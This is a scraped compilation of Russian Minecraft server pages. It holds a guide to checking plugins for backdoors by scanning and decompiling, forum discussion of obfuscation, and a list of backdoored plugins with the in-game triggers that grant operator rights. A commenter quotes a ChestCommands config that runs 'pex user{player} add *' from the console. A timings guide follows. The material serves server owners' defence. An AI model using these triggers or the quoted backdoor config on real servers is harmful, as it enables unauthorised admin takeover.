Как проверить плагин на хаки и вирусы в Майнкрафт
Как можно проверить плагин на наличие хаков и прочей нечисти? Есть множество способов, но мы рассмотрим самые простые для новичков.
Это самый простой способ, НО он НЕ ГАРАНТИРУЕТ 100% эффекта.
Spigot Anti-Malware —
Обнаруживает более 900 вредоносных плагинов. Сканирует все новые jar-файлы, rar-файлы или zip-файлы на наличие вредоносных плагинов.
ВНИМАНИЕ: ЭТО НЕ ПЛАГИН. ДЛЯ ИСПОЛЬЗОВАНИЯ ТРЕБУЕТСЯ JAVA 17 (НО ВОЗМОЖНО ЗАПУСТИТЬ И НА ДРУГОЙ ВЕРСИИ)
КАК ПОЛЬЗОВАТЬСЯ:
1. Выключи сервер, чтобы вредоносное ПО не было активным.
2. Загрузи файл MCAntiMalware.jar в каталог, в котором находится jar твоего сервера, а затем открой запускатор сервера и укажи в строке запуска сервера это: java -jar MCAntiMalware.jar
Создаем папку с MCAntiMalware.jar и загружаем туда файл
Указываем сроку в запускаторе java -jar путь/MCAntiMalware.jar
3. После завершения сканирования ты найдешь журнал в папке «AntiMalware/logs». Если есть какие-либо обнаруженные плагины, заархивируй их и пришли мне zip и лог-файлы либо в личку здесь, либо в дискорде
4.Удали обнаруженные jar-файлы, повторно загрузив заведомо безопасные и перезапусти сервер.
Эта утилита показывает уязвимые места. Потом через декомпилятор можно проверить те классы, которые нашла утилита. Будет очень странно что к примеру плагин на чат выдает опку
Это более сложный способ, но он дополняет первый и если ты хочешь разобраться в проблеме, то стоит дочитать все до конца и попробовать понять как это работает.
Для этого нам нужно скачать программу: Программа Luyten
Или любой другой декомпилятор java.
1. Тебе нужно запустить программу Luyten и нажать Open File (Ctrl+O) как показано на скриншоте ниже и поочередно открываем все плагины.
2. Ищем хаки в коде (Можно Ctrl+F но помни, что не все хаки такие простые). Желательно просмотреть весь код и если там будет срока с выдачей опки или * то возможно это хак. Так же плагин может скачивать файлы с вашего хостинга или компа. Для этого нужно искать соединение с каким либо сервером (айпи адресом). Не всегда это является хаком, некоторые разработчики так проверяют лицензии своих плагинов.
Совет: Ищите Socket, URLConnection, java.reflect.Method — это может быть легитимным использованием (телеметрия, рефлексия для NMS), а может быть и хаком (слив SSH ключей, бекдор)
Этот способ хорошо сочетается с первым. Так как утилита Spigot Anti-Malware покажет подозрительные классы и их можно найти по этой программе.
Чтобы не попадаться на хаки в плагинах, рекомендуем использовать только проверенные ресурсы, так как на них вероятность подцепить вирус куда меньше.
Всегда помни:
Скачать сборку сервера майнкрафт — действие, которое угробит ваш ещё незапущенный minecraft сервер
А так же ты можешь купить плагин у нас, мы отвечаем за качество своих ресурсов. Мы за то, чтобы ты был в безопасности.
В некоторые плагины хакеры вшивают «троян» и прочие гадости, которые могут получить доступ к твоему серверу иди компу. А так же загрузить вредоносный код в другие плагины.
Просто загрузи файл и подожди пока программа не просканирует его.
Больше полезной информации можно найти тут: https://mcgolem.com/subsite/EnotTeam
997 просмотров
Рекомендации
Как создать флаг в Майнкрафт на РолеПлей Выживание Бомжа
На выживании бомжа вышла первая версия редактора создания флагов. Если найдешь баг, то пиши нам на форум. За найденные баги мы выдаем донат валюту.
Думаешь создать очень крутой флаг в Майнкрафте
Тем временем флаг:
Развёртки скинов для чёрно-белой печати
масштаб 1:24
Вы можете распечатать эти заготовки, раскрасить их по пикселям, рисуя текстуру желаемого скина, вырезать детали и собрать скин!
Статья удалена
Этот материал был удалён по решению администрации.
-
все пишут что на всех неофициальных ресурсах плагины содержат хаки. а нельзя просто плагин открыть в эклипсе и просмотреть код на наличие хаков? если нельзя, то разработчики, объясните в чем я не прав
-
Overwrite
Активный участник
Пользователь- Баллы:
- 98
- Имя в Minecraft:
- artcart
Слишком много людей не верят в то, что люди могут выкладывать плагины без злого умысла, а тупо для того чтобы распространить своё творение.
В большинстве случаев достаточно будет просто нормально проверить код через декомпилятор, чтобы определить имеется ли там как или что-либо. Если код обфусцирован — такое лучше не качать -
Можно.
Но с вероятностью 90% такие плагины обфусцированы (их код для человека очень сложно или невозможно понять и делается это отдельными утилитами при компиляции плагина).
Никто не будет тратить время на то, чтобы разобраться в таком коде (кроме некоторых исключений). Попробуй декомпилировать майнкрафт, поймешь о чем речь. -
SashaBrine
Активный участник
Пользователь- Баллы:
- 76
- Имя в Minecraft:
- IJustFortiLive
-
я слышал что майнкрафт состоит из спагетти кода
-
SashaBrine
Активный участник
Пользователь- Баллы:
- 76
- Имя в Minecraft:
- IJustFortiLive
реально? а я думал из кофе
![[IMG]](data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E)
-
YourAlt
Активный участник
ПользовательЕсли содержимое плагина обфусцированно, его лучше просто не устанавливать. Если нет его можно разобрать (декомпелировать) и попробовать найти в нём скрытый функционал. Кстати есть специальный плагин-антивирус для поиска вредоносных плагинов, может быть будет полезно
https://www.spigotmc.org/resources/spigot-anti-malware.64982/ -
Overwrite
Активный участник
Пользователь- Баллы:
- 98
- Имя в Minecraft:
- artcart
Этот анти-малварь — лютейшая клоунада. Он способен обнаружить только setOp(true) — не более
-
Dymeth
Активный участник
Пользователь- Баллы:
- 98
- Имя в Minecraft:
- Dymeth
Теоретически можно проверить всё. Но на практике:
1) Это может занять очень много времени из-за большого объёма кода
2) Это может занять ещё больше времени, если код обфусцированБолее того, многие НЕ проверяют код в библиотеках, вшитых в плагины. Например, google.gson или apache.commons.lang. Хотя там тоже прекрасно может быть подлянка.
На самом деле, процесс проверки можно ускорить, если использовать автоматические анализаторы кода по типу keiko, но даже с его использованием времени может уйти уйма.
Поэтому если ты заботишься о экономической выгодности своего сервера — необходимо 2 раза подумать, прежде чем тратить время на анализ крупного/обфусцированного плагина. Возможно выгоднее было бы за денежку заказать допил уже существующего с похожим функционалом (но которому ты будешь доверять на 100%).
Не существует идеального кода, но в целом код игры сейчас уже достаточно неплох если сравнивать с тем, что было раньше. Очень сильно всё отрефакторили в связи с введением нового функционала
Последнее редактирование: 17 апр 2022 -
Dymeth
Активный участник
Пользователь- Баллы:
- 98
- Имя в Minecraft:
- Dymeth
Во-первых, ничего более адекватного, к сожалению, на текущий момент просто нет. Keiko не подходит для полноценного использования в продакшне.
Во-вторых, ты не прав касательно того, что этот плагин может детектить только .setOp(true).
Пара примеров:
https://github.com/OpticFusion1/MCA…alware/scanner/realtime/DirectoryWatcher.java
https://github.com/OpticFusion1/MCA…antimalware/check/impl/SystemAccessCheck.javaЕстественно, идеальной защиты не существует. И в целом даже не проблема — адекватно критиковать то, что есть.
Но конкретно твои слова звучат как «не используй это, потому что оно плохо работает». А эта логика неверна. Лучше использовать хоть что-то, чем не использовать ничего. Особенно, если ты любитель пиратских плагинов. Хотя я такое осуждаю -
Overwrite
Активный участник
Пользователь- Баллы:
- 98
- Имя в Minecraft:
- artcart
По крайней мере когда я давал этой штуке на проверку ряд хак плагинов — он не пометил и половины
(а если плагин под обуфой то я не думаю что он будет хоть на что-то способен) -
Dymeth
Активный участник
Пользователь- Баллы:
- 98
- Имя в Minecraft:
- Dymeth
Будет. В плагине несколько runtime-проверок
![[IMG]](https://upload.wikimedia.org/wikipedia/uk/8/85/%D0%9B%D0%BE%D0%B3%D0%BE%D1%82%D0%B8%D0%BF_Java.png)
Поделиться этой страницей
-
Пожалуйста, можете подсказать, как обнаружить в плагине так называемый ‘Hack’ в плагине?
Допустим, я на том же Rubukkit нашел самопис, но как мне убедится что там нет никаких лозеек и примычек?
Что то слышал о JD GUI, можно поподробней:?
====================================================================
Заранее спасибо :3 -
Reality_SC
Старожил
Пользователь- Баллы:
- 123
- Имя в Minecraft:
- Reality_SC
-
CoolBoy
Активный участник
Пользователь- Баллы:
- 96
- Skype:
- thecoolboy2070
- Имя в Minecraft:
- CoolBoy
ТС, а ты думаешь, при проверке плагина напишет, мол:
ВАРНИНГ, ПЛАГИН ИМЕЕТ ХАК.
??? -
NuaN
Активный участник
Пользователь- Баллы:
- 76
- Имя в Minecraft:
- NuaN
Открываешь JD-GUI и переносишь в него джарник. и читаешь код…. дальше зависит все от твоих знаний Java и Bukkit API
-
Кстати, есть UralPassport, в котором открытым текстом написано, что плагин с хаком
-
CoolBoy
Активный участник
Пользователь- Баллы:
- 96
- Skype:
- thecoolboy2070
- Имя в Minecraft:
- CoolBoy
Не сталкивался с таким и о плагине не слышал.
-
Ну и правильно, плагины задудось меня полностью нафиг не нужны. При частых заходах на серв он соржет весь тпс.
<
Поделиться этой страницей
Описание:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью. Способы получения админок очень разные и хитрые. Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список: 1. aAntiSpam_v1.1 - способ взлома пока не известен. 2. Dupe - способ взлома пока не известен. 3. FloodProtect - Ударить по грязи три раза и прописать в чате команду /fp help 18971712 4. AntiBot - Берем рычаг в руки и нажимаем ПКМ. 5. Ural Paspport - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. Скрин. 6. HypixelPets - Прописать в чате команду /nethernetwork2skingworld76 (не проверено). 7. ProtocolLibFix - Прописать команду /protocollibfix:autoworld (Не проверено). /CM проверить есть ли плагин, потом крафтим табличку и пишем CMBest в чате появится: " у вас * ник: Поздравляю". 8. RegisterFix - Появляется меню ChestCommands, кликнуть на определённый предмет в меню. 9. BukkitApiEnhancer - Написать в чат /xhomexx (Не проверено).
-
alex
14 апреля 2017 — 19:58
Появился еще один плагин с уязвимостью RegisterFix
-
14 апреля 2017 — 19:59
alex gamer сказал(а):Какой способ взлома?Появился еще один плагин с уязвимостью RegisterFix
-
alex
14 апреля 2017 — 20:08
Сергей TU154 сказал(а):Способ взлома пока что не известен, мне ее скинули чтобы я ее установил за покупку доната. Я сделал вид что установил этот плагин, и потом мне написал этот человек что я не установил ее. После этого я ему написал на проверку что плагин с уязвимостью он начал грубить и добавил в ЧС. Могу скинуть этот плагин...Какой способ взлома?
-
alex
14 апреля 2017 — 20:13
Сергей TU154 сказал(а):Нашел способ взлома!! Это переделанный ChestCommands толькоКакой способ взлома?
menu-settings: name: '&cВзлом опки.' rows: 1 command:'register110011110' aa4: COMMAND:'tell:&3Админка взломана!;console:pex user{player} add *' NAME: '&eВзлом админки' LORE: - '' ID: '264' POSITION-X: 5 POSITION-Y: 1
-
14 апреля 2017 — 20:18
-
Nextler
23 августа 2017 — 15:06
Выход из всех ситуации настолько прост. Что нужно делать чтобы не было проблем с сервером: 1. Самим собирать сборку сервера 2. Устанавливать плагины он зарубежных авторов или от наших но только проверенных 3. Доверять свой сервер проверенным людям( то есть выдать администратора или оператора)4. Никому не давать доступ к своей сборке/консоли сервера. 5. 5 раз перечитать функционал плагина перед его установкой на сервер !!
-
Женя
14 марта 2018 — 20:32
Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
-
Сергей
14 марта 2018 — 21:33
Женя Жека228 сказал(а): Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
Это ещё не весь список, есть и другие, так что будьте осторожнее.
-
Вова
27 мая 2019 — 09:37
alex, Боже все норм у меня стоит плагин за щита от взлома опки и рех и все все команды проверил не работаеют у меня пишут нет таокй команды + я за претил всем писать команду help так как она иметь просомтр плагинов
1. Понимание таймингов
Цикл игры Minecraft работает по тикам. В 1 секунде 20 тиков, то есть один тик должен происходить каждые 50 миллисекунд. Во время одного из этих тиков обрабатываются различные события (от игровых тиков, таких как загрузка чанков и взаимодействие игроков с блоками), и каждый плагин, установленный на сервере, будет обрабатывать эти события по-разному (например, такой плагин, как WorldGuard, использует PlayerMoveEvent чтобы убедиться, что игрока нет там, где ему не следует).
Вот здесь и пригодятся данные о времени. Они позволяют отслеживать, сколько времени требуется плагинам, установленным на вашем сервере, для обработки события. Это позволяет вам видеть, где возникают проблемы с задержкой, поскольку некорректный плагин, который требует много времени для обработки события, может привести к задержкам в цикле тиков и, следовательно, к скорости тиков сервера ниже 20.
2. Включение
Для отслеживание таймингов, прописываем в консоль команду:
— timings on
Оставляем сервер, на пару минут, пытаемся использовать все плагины, на максимум ( Проверяйте абсолютно все «действия»)
После ваших действий включаем логи наших плагинов, на проверку Pct*
Прописываем следующие:
— timings paste
Получаем ссылку с нашими значениями.
Можем выключить отслеживание и переходим к разбору.
— timings off
3. Разбор (Средние значения)
У рабочих плагинов, с которыми нет проблем в среднем Pct*
Значение не превышает 20%
На примере Citizens, мы видим, что плагин не вызывает критических нагрузок и работает без проблем.
На примере Acubelets, мы видим, что плагин работает с небольшими просадками на ‘Event_JoinQuit’, но в целом значение не критическое, такой плагин может функционировать на хорошем железе.
А дальше виновник торжества, плагин GadgetsMenu, т.к клиент сэкономил и скачал старую версию плагина, которая не функционирует как должно быть на его версии. Что вызывало сильную нагрузку на процессор.
( Полное объяснение и пояснение фикса, только платным улучшением в лс паблика Вконтакте )
11,201% — CRIT данный плагин не может использоваться на сервере.
4. Заключение
Наш сайт сфокусирован не только на сливах, но и поддержке авторов, если вы столкнулись с ошибками обратитесь к специалистам, заплатите не жалейте денег, если вы хотите качественную и адекватную настройку.
Очень кратко, я постарался объяснить, как быстро узнать крит.плагины, если вы хотите больше тем о грамотных настройках и пояснение о проблемах выскажите свое мнение в комментариях.